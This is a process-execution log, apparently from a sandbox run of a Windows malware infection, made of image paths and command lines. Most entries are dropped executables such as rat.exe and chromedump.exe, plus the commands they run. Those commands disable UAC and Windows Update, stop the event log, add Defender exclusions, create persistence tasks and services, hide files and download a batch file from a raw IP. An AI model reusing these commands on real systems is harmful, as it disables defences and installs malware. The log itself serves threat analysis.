"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2192,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3248 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,16294943843941982083,16872312599780656693,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5096 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Steam.Upgreyd.exe"
C:\Users\Admin\AppData\Local\Temp\Files\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alphaTweaks.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alphaTweaks.exe"
C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nSoft.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Office2024.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Office2024.exe"
C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn Server /tr C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
C:\Users\Admin\AppData\Local\Temp\Files\cli.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cli.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\65CA.tmp\65CB.tmp\65CC.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE
"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C03.tmp\6C04.tmp\6C05.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb1c5946f8,0x7ffb1c594708,0x7ffb1c594718
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1972 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2357307261719350472,15708084231982912328,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe
"C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe"
C:\Users\Admin\AppData\Local\Temp\Files\4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4.exe"
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\requirements.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'requirements.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\requirements.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'requirements.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "requirements" /tr "C:\Users\Admin\AppData\Local\Temp\requirements.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "QKJNEQWA"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "QKJNEQWA"
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\cmd.exe
cmd.exe
C:\Users\Admin\AppData\Local\Temp\Files\SharpHound.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SharpHound.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe"
C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2AB0.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2AB0.tmp.bat
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 436 -ip 436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 1136
C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe"
C:\Users\Admin\AppData\Local\Temp\Files\r2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"
C:\Users\Admin\AppData\Local\Temp\Files\test_again4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test_again4.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Discord3.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ZZZ.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ZZZ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5196 -ip 5196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 444
C:\Users\Admin\AppData\Local\Temp\Files\zts.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4484 -ip 4484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 440
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpADF9.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TigerHulk3.exe"
C:\Users\Admin\AppData\Roaming\Discord.exe
"C:\Users\Admin\AppData\Roaming\Discord.exe"
C:\Users\Admin\AppData\Local\Temp\Files\chromedump.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chromedump.exe"
C:\Users\Admin\AppData\Local\Temp\Server.exe
C:\Users\Admin\AppData\Local\Temp/Server.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\Users\Admin\AppData\Local\Temp\requirements.exe
C:\ProgramData\jmqid\ljid.exe
C:\ProgramData\jmqid\ljid.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Users\Admin\AppData\Local\Temp\Files\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\Files\C1J7SVw.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\Files\rat.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
C:\Users\Admin\AppData\Local\Temp\Files\rat.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rat.exe"
C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe
"C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe"
C:\Users\Admin\AppData\Local\Temp\481117205.exe
C:\Users\Admin\AppData\Local\Temp\481117205.exe
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\1533232769.exe
C:\Users\Admin\AppData\Local\Temp\1533232769.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Users\Admin\AppData\Local\Temp\Files\softina.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"
C:\Users\Admin\AppData\Local\Temp\3193919340.exe
C:\Users\Admin\AppData\Local\Temp\3193919340.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\ProgramData\jmqid\ljid.exe
"C:\ProgramData\jmqid\ljid.exe"
C:\Users\Admin\AppData\Local\Temp\78947491.exe
C:\Users\Admin\AppData\Local\Temp\78947491.exe
C:\Users\Admin\AppData\Local\Temp\1902930370.exe
C:\Users\Admin\AppData\Local\Temp\1902930370.exe
C:\Users\Admin\AppData\Local\Temp\557628208.exe
C:\Users\Admin\AppData\Local\Temp\557628208.exe
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe"
C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe
